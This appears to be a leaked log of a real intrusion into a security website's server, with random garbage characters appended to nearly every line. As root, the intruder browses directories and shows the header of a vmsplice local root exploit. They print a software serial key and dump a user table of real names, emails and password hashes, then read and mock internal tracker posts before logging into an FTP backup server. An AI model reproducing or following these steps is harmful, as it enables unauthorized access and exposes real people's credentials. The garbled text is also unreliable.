. k+ R0 Y" I# O7 X, c2 |sh-3.2# cd com& p; m% I4 D3 ?
sh-3.2# ls -la) K: E0 Y% g0 Y1 y0 x0 x7 r
total 141208: e$ ^+ ?- b1 n2 B/ g n: V3 W) a
drwx–x–x 10 com com 4096 Apr 28 12:40 .
2 D+ W }+ ]2 l+ M' {drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. I4 c- l1 o" V& h* a( ^9 J2 v
drwx—— 2 com com 4096 Jun 4 04:04 backups+ R' S3 k3 a% l& w: R/ z- o
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
( I w! J! ?+ x) ~drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system* A$ W. z9 t* q9 x
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
2 \, W6 j. m% J! `8 l-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout9 W e! q7 S- G J' P
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile/ N4 Q$ h |0 x5 f. \& f; l4 A/ c
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
+ w5 _% F$ g0 X; l3 \+ F2 ]drwx–x–x 3 com com 4096 Jan 29 2008 domains
3 W# j9 S2 H3 Y' c-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
& S' `; u' f I1 X& T: |drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
1 u3 ?! p$ B; T9 x4 _-rw——- 1 com com 69 Nov 18 2008 .lesshst3 e( B! ~( H2 V' @* z- D
drwx—— 2 com com 4096 Sep 24 2007 mail
3 ^) F3 \: I3 \/ L9 t/ I; l-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
$ |9 y* H. ~# n& h/ h- ^4 V- Ndrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp/ \& P: r) x- _
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html! N1 [ o* Z2 \7 h5 @/ ^
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow" a8 ~& ?% D% P+ |) K
drwx—— 2 com com 4096 Aug 26 2008 .ssh& D) l8 i3 y& H5 X0 @
-rwx—— 1 com com 8515 Feb 10 2008 t
: h# W: ^* t. \1 j-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
7 i! h* X0 f+ K0 Y: b9 F7 G, Adrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
' O( f$ ^6 _. m: i( f7 ]+ Q- i& y-rw-rw-r– 1 com com 617 May 20 2008 .toprc
) p- Y' T! ^0 S& u-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
- ]1 j( N! @9 k4 ?-rw——- 1 com com 16629 Mar 28 21:46 .viminfo) `& l3 M% y! q1 `3 Z' t L, `
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc8 B) {3 Z2 ^1 e, c
4 x- S) }; _# S$ k% K7 R0 c8 d1 ssh-3.2# head t.c1 `& `6 Z; G7 i Q3 E; r% M
/*! z" q0 t7 c" i; w6 E5 ~
* jessica_biel_naked_in_my_bed.c! M S, |0 X' c! E4 t' B( Z
*
+ |8 U/ E% X+ n- z* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
! L7 x; o3 y- n8 |3 \. Z: H: v9 t* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
" J% t# U# i. ?2 D. [& y% E* Stejnak je to stare jak cyp a aj jakesyk rozbite.2 J# [: ]( V) }/ m( K
*
4 i6 M& Y2 G9 @1 A4 X* u9 v% w* Linux vmsplice Local Root Exploit
V( X& v. S: B. E y8 M* By qaaz
. E3 R% D* _* [1 U*; n, i$ Q+ s: m9 N
- V3 a, g! K$ ^3 V( @. l# y) rsh-3.2# cd /" Z3 k" T" O" G: a1 t
sh-3.2# ls -la
: ?( n/ @2 a+ ]+ x/ J- Jtotal 360% y* M; o9 _# |7 l4 r
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
1 O3 _2 @: |2 A. A; m# O7 Q# gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
+ |2 D* w& A5 T" V-rw——- 1 root root 10240 Jun 3 02:39 aquota.group$ t0 V! s/ e4 |: z" `0 P% g
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user3 [, v$ X4 w5 v9 P7 w6 U
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db5 V. E: q; _( i8 ?* R
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
0 E- {+ p0 n, d$ i9 C8 B-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
8 {# s. [3 I9 C) o' L$ n/ ldrwxr-xr-x 3 root root 4096 Dec 29 2007 backup6 W# q! a% y- L% [: Y
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin; S: y- C+ N& O9 q2 d# t- B
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
) u( e# _+ y. W: U% g+ K+ bdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev' ?' R5 D' P& h% p$ u1 [
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc2 q" S+ H* d5 m
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
; E# B: R0 g% g' H! v5 b* `-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
: ^- a( G3 Z) M5 n; e& R+ [$ Vdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib6 O( x0 N8 \9 o0 U
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib646 ^# K3 _3 i2 ^7 Z
drwx—— 2 root root 16384 Sep 11 2007 lost+found
! N: X# H3 l8 g# z+ Xdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
- J4 n2 `; R8 odrwxr-xr-x 2 root root 0 Jun 3 02:43 misc8 u) S# G$ `# g3 t7 w
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt" f o2 I4 h) q
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg# s1 B$ K. G5 Z" q$ R5 M9 q
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
6 Y; r- X/ d8 R% w' vdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt! Y o; }0 w4 x
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
; D' I3 q3 z% h: W! G b9 Mdrwxr-x— 15 root root 4096 Jun 4 08:40 root9 {$ a# R7 e* \$ G5 f3 l
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
( H( M4 v7 T+ ?drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux2 _1 d% ~4 o+ k& |
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
# O+ o9 c5 b5 Y' C2 q. S( ydrwxr-xr-x 11 root root 0 Jun 3 02:42 sys1 M j+ M& X8 B% o! Z' A& \3 z C
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp& M2 Y# b5 p4 {( V( `/ Y5 x- V
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
( l m0 t3 V. D5 Q+ fdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
1 \$ q1 h! R, ?; W
, w! I4 H% H5 [! R4 b: t# @. `sh-3.2# cd opt
) S, k9 p& {/ [* l; }sh-3.2# ls -la
1 Z" P/ w5 W- f; Utotal 20
6 M, C' @6 R2 udrwxr-xr-x 3 root root 4096 Mar 11 17:56 .1 _- [4 m% B: O* a
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. X4 n. V% I9 l3 x* T$ Hdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
5 d" y) o3 m" C0 c1 K; C X' ~* Z b3 ^/ w2 O6 L4 Y$ I
sh-3.2# cd lsws/+ z( a& Y9 p5 N# `. I
sh-3.2# ls -la- Y" W! [. x0 R6 B' R) o9 Y' K
total 108
: n+ ^/ O' _8 mdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
6 G* z7 K6 V+ q9 K) Odrwxr-xr-x 3 root root 4096 Mar 11 17:56 ../ B) U# O7 t+ {2 H
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons8 P! w# x; F& m% `
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
1 u% N# ^6 a: Y$ ]3 m* N# I7 Rdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
8 D3 V' T: G: f7 ^drwxr-xr-x 2 root root 4096 May 29 15:10 bin
9 s' u& \& F' y/ c% Kdrwx—— 4 apache apache 4096 Jun 3 02:43 conf
- ~' s/ _8 p% @: v" B# Ddrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT2 H2 H& p: ^2 ?
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
2 N! o# ?! V8 R8 wdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin/ B; v( Z3 y! J q. V X1 R
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib8 l% j3 m7 x- Y5 {3 A3 a! d( }& M
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
+ J- {% v! A( b5 h( Z- z) f-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP+ p5 a0 B: N' f7 ?: B
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
3 u) U% L8 `6 o( I/ }( w" f-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP i/ c7 i4 u2 |. _( \
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
8 O+ y3 _& j& v3 n ^- idrwxr-xr-x 2 root root 4096 Mar 20 2008 php# s. O2 R9 A$ Y( P1 f
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild/ D2 O; |8 ]; u. @
drwxr-xr-x 3 root root 4096 Mar 20 2008 share& V* }" Q6 F; g4 l
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
! c1 I+ W! I( s) a+ c) `+ l' M1 Y+ _6 m6 r
sh-3.2# cd conf
9 k( n. k- J9 F) t. fsh-3.2# ls -la7 e% c3 }# z0 y" @! E
total 48
' k; }8 a6 V9 B+ G0 {+ Jdrwx—— 4 apache apache 4096 Jun 3 02:43 .
1 a) F6 `2 r! Y! S! wdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..; ]+ v& N( Y' t [; E, k; s
drwx—— 2 apache apache 4096 Mar 20 2008 cert
) m! O: ~) `3 w- R-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml n5 d0 O( Y# W
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
* F0 [1 {! x+ R) T-rw-r–r– 1 root apache 0 Jun 3 14:11 .last; V! _2 Y9 J' i& i c
-rw——- 1 apache apache 256 May 29 15:10 license.key
8 L L! [! M3 O4 N, J! d9 l-rw——- 1 apache apache 256 Mar 21 2008 license.key.old. k# d1 \2 r* S
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties! I4 z! I& n" L- I5 O5 y
-rw——- 1 apache apache 20 May 29 15:10 serial.no i e z$ S/ e2 z
drwx—— 2 apache apache 4096 Mar 20 2008 templates
# F: T) P- ^5 Z# J8 F7 b
7 o0 N- w6 H7 Z$ I* ]( N% ush-3.2# cat serial.no# c' f' n! x- t: \3 u& _5 G
IbDl-oVsO-CKqL-wVRa; ^" l4 ~, X. @) ~. p
) N% k2 s+ Q" j* e( O; k
sh-3.2# mysql
* v; b- B% o `% ~5 @Welcome to the MySQL monitor. Commands end with ; or \g.! r+ w* b% f+ T/ J- F
Your MySQL connection id is 286844$ z7 O+ `' |2 n. c) q. o( K
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
6 k3 n/ n* p( f, A% b! y: T' Z% V4 d5 R" h* R9 E# C1 w& i& V
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.; P, T. ?/ W }; ?/ X. k+ H7 P# r
+ k s \ v( L- A* f
mysql> show databases;
3 b3 S4 g5 U) Z7 L/ t+———————–+
: @. W6 O+ ~* g. F- z/ U# ]| Database |
* x" _. p: K j. \: c: A% e+———————–+ |, M/ |4 f0 J( P' _
| information_schema |
, q h+ W( \8 Y. X2 U& J; u| astanet_ads |+ f( I1 _$ B' f
| astanet_mailing_lists |+ B" X+ o( D) \
| astanet_mediawiki |) h6 o# G8 P" @- x4 y
| astanet_membersystem |
$ X% D0 P$ W. b5 T R* G9 W| com_contrexx |
# ~# h& _1 ~, o| com_contrexx2 |6 N: m+ S# D7 Q# z+ l6 Q
| com_contrexx2_live |
( Z: W% O8 _. q( v5 F9 X| da_roundcube |5 G7 i' \& S+ w- A& K$ N
| dolphin |
5 a0 k- n( _" ~| ideapool |8 @" b9 ^3 O! N0 u; K9 [
| mysql |
J {/ o- m# e& i5 O' S3 q" q| test | A: T. O. N+ V: z& H z) V
| yourmaster |
& C0 A4 y" S `- v+———————–+
# h* `* p/ L, T3 P' g9 h `14 rows in set (0.00 sec); y$ d0 M% j& H* M5 I
8 c/ J% z2 R: D; R( i' {! C' @9 t
mysql> use ideapool) M* s5 z A! l$ d7 s. v& \
Database changed
& B& S/ g! k! n7 Z& Y* [0 s$ zmysql> show tables;2 A9 s7 _/ c& U% T- @0 |! ]( r5 H
+———————————–+/ [6 U# q8 }9 X& c' n9 v
| Tables_in_ideapool |
G* G+ v3 A0 V: R9 ?+———————————–+. D8 H' K/ [- k6 R3 Z
| eventum_columns_to_display |: Q+ _! V1 F( w& ?; M
| eventum_custom_field |9 e% a x1 j' [# r! r& R2 b
| eventum_custom_field_option |9 \/ Z- C( R7 T; h) }& h
| eventum_custom_filter |6 ]7 E: {+ y$ b2 S6 ?4 w
| eventum_customer_account_manager |* M- n7 A* o3 ]' |' d4 ]
| eventum_customer_note |& T+ w* p; Q3 H9 L- X
| eventum_email_account |
, U( w- }. s% e1 I# J| eventum_email_draft |
& r# J: l" Z ?3 v' A| eventum_email_draft_recipient |
6 i2 \1 Q& R9 B. c# M9 Y| eventum_email_response |
: r' s" q* ~$ w9 S2 L" T( J/ F! @| eventum_faq |) v' C6 a* z0 [, ~ M( M1 X/ p$ J
| eventum_faq_support_level |8 }+ p r) k2 ], k! O; i
| eventum_group |
z4 |. v r* S* v/ I| eventum_history_type |) n G# s3 m% _( [4 o
| eventum_irc_notice |
7 p0 K3 h4 V: e0 Z( a| eventum_issue |' _+ Y5 k7 d$ ?
| eventum_issue_association |. t" I l9 n0 g; A$ }
| eventum_issue_attachment |% R. z- O; l7 ]2 R" C
| eventum_issue_attachment_file |' s# W: l. V3 f$ p9 m0 @
| eventum_issue_checkin |* T- x" u* O+ w" ?: x
| eventum_issue_custom_field |
9 _4 j, H5 L1 s5 L& J/ L| eventum_issue_history |
6 x- W0 h7 x) x7 x4 Y0 A| eventum_issue_quarantine |2 \# }1 ?$ X; U; C
| eventum_issue_requirement |) R0 h. Y% w; `& b- F% t; i1 O
| eventum_issue_user |& K* x' _1 ~; J
| eventum_issue_user_replier |3 _+ X7 K C ]# t
| eventum_link_filter |
, `4 i4 f( S' s/ m| eventum_mail_queue |7 j" A/ Y& _, D/ b* _1 H
| eventum_mail_queue_log |
& k/ c4 n4 T3 Z$ @; C' A6 H( L| eventum_news |* q0 Z/ @: H9 T6 t
| eventum_note |6 @8 g, d2 o! P; A9 x: c
| eventum_phone_support |+ X/ O3 H7 e+ W: ^( J# R9 t) e
| eventum_project |
. A2 e2 {$ |: T: C5 z9 `8 ~% G| eventum_project_category | w3 Q* | }1 b$ w4 q/ m
| eventum_project_custom_field |
' M3 P% x4 w F% p T& E| eventum_project_email_response |
1 P: _& P- X I) U| eventum_project_field_display |) U. q8 I0 m$ s( f3 _: Y
| eventum_project_group |1 Y& x9 f# t5 l: Y8 }6 R8 f$ |
| eventum_project_link_filter |0 s8 e( i X Y/ ?+ }9 I6 y# {
| eventum_project_news |; }! J- }! P$ ]. F
| eventum_project_phone_category |
7 T4 Y1 J# I5 `7 {+ l. u| eventum_project_priority |* m* h# O7 H/ b! z
| eventum_project_release |
: x+ k$ c& V8 n, H" C2 f/ j| eventum_project_round_robin |. N" a! f5 C, ?2 O! n, v; ?
| eventum_project_status |
6 S" [1 g5 y0 o+ X3 b: `" F| eventum_project_status_date | o$ V: ^5 R h
| eventum_project_user |
$ ]$ t# s9 f" W. \| eventum_reminder_action |- m# y& C" Z" r
| eventum_reminder_action_list |3 k* u5 k0 z% }& f$ \$ K& D7 U
| eventum_reminder_action_type |
% a5 c4 K: f. ^6 r| eventum_reminder_field |% z5 p Y& k+ B1 d9 f
| eventum_reminder_history |0 K$ r1 p' Y# n- e) J8 X" ^1 u$ b
| eventum_reminder_level |
: ~$ L/ a+ V# P% T% @" }5 }| eventum_reminder_level_condition |; }3 D7 x6 n3 ]0 W) d# C8 H/ n9 }
| eventum_reminder_operator |
: S: Z* o+ J- w& q| eventum_reminder_priority |
9 h% z1 V+ y6 _( `| eventum_reminder_requirement |
- D. P: a3 p; h1 p3 {| eventum_reminder_triggered_action | ~- _3 i I/ h! B: R2 p2 `+ A2 y
| eventum_resolution |; i3 \1 d3 A8 B, a1 r: E' m; Z4 T
| eventum_round_robin_user |# v! ^: S! n9 W9 L! E9 Z9 y
| eventum_search_profile |
) J" c, I3 `9 y/ A5 }7 S+ O| eventum_status |! ~9 G- g; X- Q9 A: T
| eventum_subscription |+ f/ x* X( A. R
| eventum_subscription_type |2 f$ @7 Z0 p+ L* p" {% h
| eventum_support_email |1 ~5 y) [$ P, T* t: O( H2 f
| eventum_support_email_body |, W( Q. Z- i# g6 J. i
| eventum_time_tracking |
: B% g M+ @( t| eventum_time_tracking_category |3 q+ |3 v/ w% G% y+ n
| eventum_user |
) \+ s/ I! G& C2 P) n$ h# K+———————————–+
7 g& h7 L* P0 w) T+ s69 rows in set (0.00 sec)
@+ V2 e& H: [
" Q, K4 j4 j. E: Y' Xmysql> describe eventum_user;
0 C' S7 C$ L0 E l2 P+————————-+——————+——+—–+———————+—————-+
0 `" `$ G( R) || Field | Type | Null | Key | Default | Extra |; S: o2 e y8 s
+————————-+——————+——+—–+———————+—————-+
. s; s9 x1 v1 B| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |- j% V l' B2 ~9 e/ b
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |3 d8 `- B1 w, X" \, B+ d
| usr_customer_id | int(11) unsigned | YES | | NULL | |
6 l/ F/ P2 E5 e; H% l2 m| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
9 P+ k# [; L( A$ r. _2 Y" C# j( B| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
1 Y h+ x3 K/ o" u| usr_status | varchar(8) | NO | | active | |
4 k- m, t2 W& i; d( A8 F; i| usr_password | varchar(32) | NO | | | |
4 o4 f2 {* g4 ^, I8 N- M6 {| usr_full_name | varchar(255) | NO | | | |
_- d9 q- Q( k, \9 k| usr_email | varchar(255) | NO | UNI | | |2 O4 P. [9 |* `
| usr_preferences | longtext | YES | | NULL | |1 e0 q0 J( G# G
| usr_sms_email | varchar(255) | YES | | NULL | |4 Q) N, x; s( ?) f/ v4 m
| usr_clocked_in | tinyint(1) | YES | | 0 | |
x( J H: @6 K2 U# p" }# L" q2 h| usr_lang | varchar(5) | YES | | NULL | |, b: D0 K+ n) o3 K" B& D
+————————-+——————+——+—–+———————+—————-+
& w p$ }" F2 F" s13 rows in set (0.00 sec)
$ P2 F7 q% ^$ E; [% M5 }6 N$ j7 x2 w- I
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
8 f! I% Q' |3 ~& \+———————-+——————————-+———————————-+
4 ?% w- ?; [" S2 i7 L| usr_full_name | usr_email | usr_password |
3 Q' e5 _, y" t1 ~* u+———————-+——————————-+———————————-+
A. [& `7 f6 F| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |$ T( f: P6 N' d, K9 g1 c
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |4 J0 B9 \0 C2 g/ Y8 M) y
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |% ~2 ^+ V# f, y8 a
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
* F* q2 e5 B+ u/ Y# X1 b: R* p }| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
, \$ B* K3 g3 E| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |7 ]1 |) u9 z: w }0 |" c
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |7 Q( F" m6 |' u
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |2 y t7 y. l9 m: d
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |+ Q- K, B% `; o/ U$ a. L( O
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |! v6 \7 X' W a; @
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |; T% [% Z2 h# D& c6 C( A3 K
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e | g5 B- k' }/ |7 Q9 e& N" j% a
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
, J( N# e% K9 y' ^0 u. ]| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |" P% ]$ u3 ^/ I2 q
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
: K: o+ c8 {8 ^8 ~" t+———————-+——————————-+———————————-+9 r8 K2 H3 l+ e5 F4 j L% O
15 rows in set (0.00 sec)3 K. X6 b& d/ L
+ e3 c/ P) s. L" i! r
mysql> select iss_description from eventum_issue where iss_id = 43;
1 p5 J; O; ~' Z. N+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+. \& w2 E6 n3 l5 B# o
| iss_description 6 ~: Y4 w$ B- [$ i( O
|! C& o: L- W& S( [8 a. a
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
& v/ l3 g( L% m7 X$ L| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be; B: ]- l7 ?' y, x1 X4 U
connected for 90 mins… 120mins… so what i propose is something like: r8 g2 T7 J$ {0 ^. b% U( g
链接标记[url]http://www.surfthechannel.com/[/url]
6 ^+ [: w! s9 l" E, a; J- o2 T! lsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
: U' i2 F( t( e8 @9 m% Hlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t6 j- F0 J: y0 U' M/ |4 P
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off+ b$ ~: e/ X! `
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…! ]& K3 O8 A; d1 Z; w! z
, L7 n' e9 {5 ?4 x* x- g% FWe could also put advertisement during play on the flash video player itself… extra $$…
4 R. f f& k& i( W ], G
, I( S% e: v6 l) p1 G7 NBy sykadul |1 }! w& G% z1 D; M
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
2 _, P/ I3 A4 _: ]0 m- x- a! O1 row in set (0.00 sec)+ D3 R( }* _, @5 s
4 j: {; R' b0 s, J6 l// Money and extra $$ is all they care about. remember that.7 h) P h. z9 p( t# W+ R
: _" H) R% H* P& |7 f8 p5 l
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
- G0 M1 \1 I0 a( ], I0 m6 P" a+————————+——————————————————————————————————————————————————————————————————————————————-+
' ]& D: x0 Y: Y, X) P| iss_summary | iss_description
! C* d# L* C; @, G|
$ o9 W& L: {4 j' K1 ]/ y+————————+——————————————————————————————————————————————————————————————————————————————-+
! _8 b( O; C$ w/ s5 q0 Z& W| Forum for REAL EXPERTS | Hello,
: n$ M( O. b. d
9 f# H$ X# [; v# I- m) U: fIshtus and I,
9 ?$ g8 d# t* o0 e4 e/ `/ z( m- }8 m. T3 ~5 k
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide8 t- l4 s& ]$ L s
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..3 Z1 T! f+ {3 k/ F- k
/ e7 Y2 @% @5 D9 k1 G! J% ~) B7 q/ \
One example a friend of mine from coresecurity.com!7 p; m+ L* C$ \6 [" W3 j
' q+ M$ {3 H% I5 KWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..8 {+ e% d7 N. l: E
' x. W3 g( h( w! {0 b
|
0 L$ K. b) B! K- I$ e4 ]7 p. h- t+————————+——————————————————————————————————————————————————————————————————————————————+3 V" b0 Q, @# P5 J9 c+ j1 c
1 row in set (0.00 sec)
: K3 J! b" q0 k/ O0 N/ ]5 ~: } y; e8 ?* O
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
- H' S) d' T& A+ Q: `, J- t, i
2 ~! w# H! |- |8 gmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;' R" Z! g/ X( L& k( W
+——————+———————————————————————————————+, F# y9 n+ O) V9 d0 p2 c# C- e
| iss_summary | iss_description |9 y' D! P( m" O" ]$ F; k; q7 Q5 m) {
+——————+———————————————————————————————+
. W; U8 c2 y9 J# [" x# t ~) J| Website guidance | Virtual Girl which guides you trought the website.
8 K8 J1 b; I6 {' ~* ]* Y
: q1 [/ N$ _5 b) g0 HWe need a girl with who you can ( talk )!!!
8 V" p3 ^6 Z: t; rAlso for the News!2 S4 I8 O% \6 `$ S2 Y
So my suggestion is a girl who read you the news loud if you like!
) ~- C2 ^6 o$ q6 o5 ]$ }" j5 Y: Xyou can choose between read yourselfe or she read it for you or both!+ V0 d# I# q( q& a5 X ^
5 g; K6 P4 z6 D O# P1 [Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
: P w* y8 g5 H: h9 S2 u3 |3 A+ p6 I- M( W; C
Have a look on the example girls!!/ p7 t6 _% ^* c/ l5 n
/ i- \5 R; O3 i" p. u' i5 l; W链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
' D* p6 Z, Y. N1 _1 N4 ~
& h: M6 T0 K& d, _" _0 K) zor that
: U/ T, Y) I( J& X8 S& q% p5 _1 _2 [3 d! w. n) m/ z4 L8 I" |- k) c
链接标记[url]http://www.yellostrom.de/[/url]
' ?8 }$ A8 y5 e5 }$ Z
- X# y- V* ^3 N9 j8 A2 \|
, Z1 s* n8 Y) g( K9 P) D _+——————+———————————————————————————————++ T f& ]6 y. a" a3 f+ ~0 c
1 row in set (0.00 sec)0 z4 m8 q" y! L& E% v5 C7 Y, @
( B: e* a& N$ p b8 ~- H
// ha ha.
. h& [8 {+ J1 c& {# M: X
: |2 |; Y4 b4 l% a7 [- J% W& Umysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
# R3 Y, Z+ o3 f/ I2 T+————————–+———————————————————————————————————–+9 V, {% Z! G# r8 D4 S/ F
| iss_summary | iss_description |
$ t" S* M5 k+ V+————————–+———————————————————————————————————–+4 K/ ~9 m, q$ f |* R) |
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
+ u; s2 G4 X- h- V, A1 P+————————–+———————————————————————————————————–+
4 T! p I8 J+ v9 Q; \1 v# U" l" w0 F) J1 row in set (0.00 sec)
w4 e3 S6 P: M+ Z% _0 J5 _" I1 @' M( l8 ]
// LOL.
. F; l, W# A) x( K3 |: e, T- A& `1 o' i0 H( |& K
mysql> exit
* Q. a( \- \, {Bye
0 j( ^3 w7 |4 `- P
8 c6 D% s- @9 F: W2 G+ ash-3.2# ftp 212.254.194.163
) m3 Z/ Q/ j$ _( z' h( yConnected to 212.254.194.163." C v3 T5 }3 \- U2 P1 ?+ s) |
220 BackupCOM_VW FTP server ready.1 n; H' G$ J: ~5 q/ R; R+ L3 v
504 AUTH: security mechanism ‘GSSAPI’ not supported.
. e$ x1 J4 ~$ \% P7 b `504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
Y4 h X U6 o0 }* L2 IKERBEROS_V4 rejected as an authentication type
0 T( a! } }+ e$ }' wName (212.254.194.163:root): astalavista.com
) _; }" o, ?/ Q0 M331 Password required for astalavista.com.) P3 s) i1 r7 L
Password:
- u; `- \/ F3 e* |6 D230 User astalavista.com logged in.
8 V% h* E4 r" [) {& N( ?) oRemote system type is UNIX.
9 s- p$ X, Z* K2 h( S. H k% k4 xUsing binary mode to transfer files." `/ u/ o8 h0 k( |/ L
ftp> ls -la+ U; V) c1 `% {* o! ~$ y+ r
227 Entering Passive Mode (212,254,194,163,2,188)8 m+ z: o! w1 L6 s! H* f
150 Opening BINARY mode data connection for ‘file list’.
7 f- _8 g' I9 d, N8 _dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
a5 A; H( x% l) h' q226 Transfer complete.
0 I- G3 t. r: t7 t5 F3 Rftp> cd astalavista.com
0 }, X; Y# t; T) [( C' a$ S250 CWD command successful. w, S" k9 M8 ?3 p# z1 E% v
ftp> ls -la
4 }1 g& z- P4 ^% C9 f6 u3 E* u- Q# f227 Entering Passive Mode (212,254,194,163,2,189)
/ {" F7 I. A m, ?150 Opening BINARY mode data connection for ‘file list’.; w& J$ z5 M: D' r+ \+ I8 P
